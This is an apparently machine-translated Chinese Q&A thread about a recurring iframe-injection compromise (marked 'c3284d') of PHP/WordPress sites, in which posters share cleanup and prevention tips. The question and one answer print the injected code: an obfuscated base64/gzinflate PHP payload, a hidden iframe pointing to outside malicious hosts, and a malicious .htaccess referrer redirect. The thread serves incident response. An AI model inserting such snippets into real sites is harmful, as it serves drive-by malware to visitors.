php - 网站 iframe 攻击 - 将代码插入源代码

Question

在过去的几天里，我的网站一再成为 iframe 攻击的目标。该代码主要附加到 PHP 和 Javascript 页面。然后代码是 PHP base 64 编码，参见示例（我稍微更改了代码以中和它）：

#c3284d#
echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8    VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L")));
#/c3284d#

这个解码看起来像这样：

<script type="text/javascript">
    document.write(
        '<iframe src="http://opticmoxie.com/xxxxxxx.php"     
         name="Twitter" scrolling="auto" frameborder="no" 
         align="center" height="2" width="2"></iframe>'
    );

一个共同点是所有代码都有注释“#c3284d#”，因此追踪恶意代码并不困难。但是很费时间...

我们在 Gradwell（英国）的共享服务器上，它们并没有特别有用。所以问题是我能做些什么来阻止这个问题重演？我知道 MySQL 注入攻击并使用 PHP 的 mysql_real_escape_string 来防范此类攻击。

该站点是PHP和MySQL驱动器。我们使用 MySQLFTP 并拥有一个用于 SSH 访问的 shell 帐户。我们使用 Wordpress（已停用插件的最新更新）。

Answer 1

在我管理的所有 Wordpress 网站上都有同样的问题。没有找到感染源，我敢打赌它是我电脑上的一些蠕虫病毒，或者是我在所有网站上安装的一些插件。

我在 WP-Better 安全插件日志中发现了所有被修改的文件并删除了额外的受感染代码，并且在我对所有感染源的文件进行了 chmod 444 之后。

现在我自由了，因为 1 个月的邪恶 iframe/htacess 和其他东西。

Answer 2

我遇到过同样的问题。FTP 服务器的访问日志显示修改是使用被黑的 FTP 密码进行的。

Answer 3

我有同样的问题，但进入了一个 Wordpress 网站。

我猜该网站是通过小部件感染的，因为我使用了一个允许执行 PHP 代码的插件。

我最好的解决方案是：

• 消除可疑小部件；
• 查看一个受感染文件的时间和日期（我的案例：header.php）；
• 清除所有受感染的文件（在我的情况下，我有网站的备份）；
• 在日志文件中搜索当时的可疑 IP（在黑名单中搜索找到的 IP）；
• 安装一个插件来禁止可疑IP。

从那一刻起，问题就消失了。我希望这能帮到您。

Answer 4

我建议你看看这个：
http
://websiteprotection.blogspot.pt/2009/10/measures-to-prevent-and-detect-iframe.html它也有一个脚本来清理它。

Answer 5

我有同样的问题，发现他们用来进入的方法是一个被黑的 ftp 密码。

尽管这是在启用了 CPHulk 暴力保护的 cPanel 服务器上运行的，但我发现黑客试图通过数千个不同的受感染主机暴力破解他们的方式。

幸运的是，我有所有上传文件的日志，所以我编写了一个脚本来从备份中恢复这些文件。

然后，我通过减少帐户被锁定之前所需的失败尝试次数来提高 cPanel 蛮力保护级别。

Answer 6

我在许多不同的域上都有相同的问题和不同被黑文件的变体。我注意到的一件常见的事情是 Wordpress。我们在许多这些服务器上都有 wordpress，我认为这是常见的罪魁祸首。我已经更新了我所有的 wordpress 帐户，更改了所有域帐户的所有密码。不确定问题是否已经完全解决。

Answer 7

我也有同样的问题。在我的情况下，附加代码是

<!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://poseyhumane.org/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->

此外，还有一个 .htaccess 文件，如下所示：

> #c3284d# <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER}
> ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
> RewriteRule ^(.*)$ http://onestopchinasource.com/catalog/stats.php
> [R=301,L] </IfModule>
> #/c3284d#

我发现了两篇关于这个问题的文章： http ://www.webmasterworld.com/html/4472821.htm和http://stopmalvertising.com/malware-reports/the-c3284d-malware-network-stats.php.html

希望能帮助到你

Answer 8

坏人可以访问您的代码，因此您必须关闭他们的访问权限，同时您可以使用一个简单的脚本来检查并删除它检测到 gzinflate 的所有行（base64_decode，但即使是最好的代码（带有备份文件的校验和检查器）如果他们仍然可以访问，那将毫无用处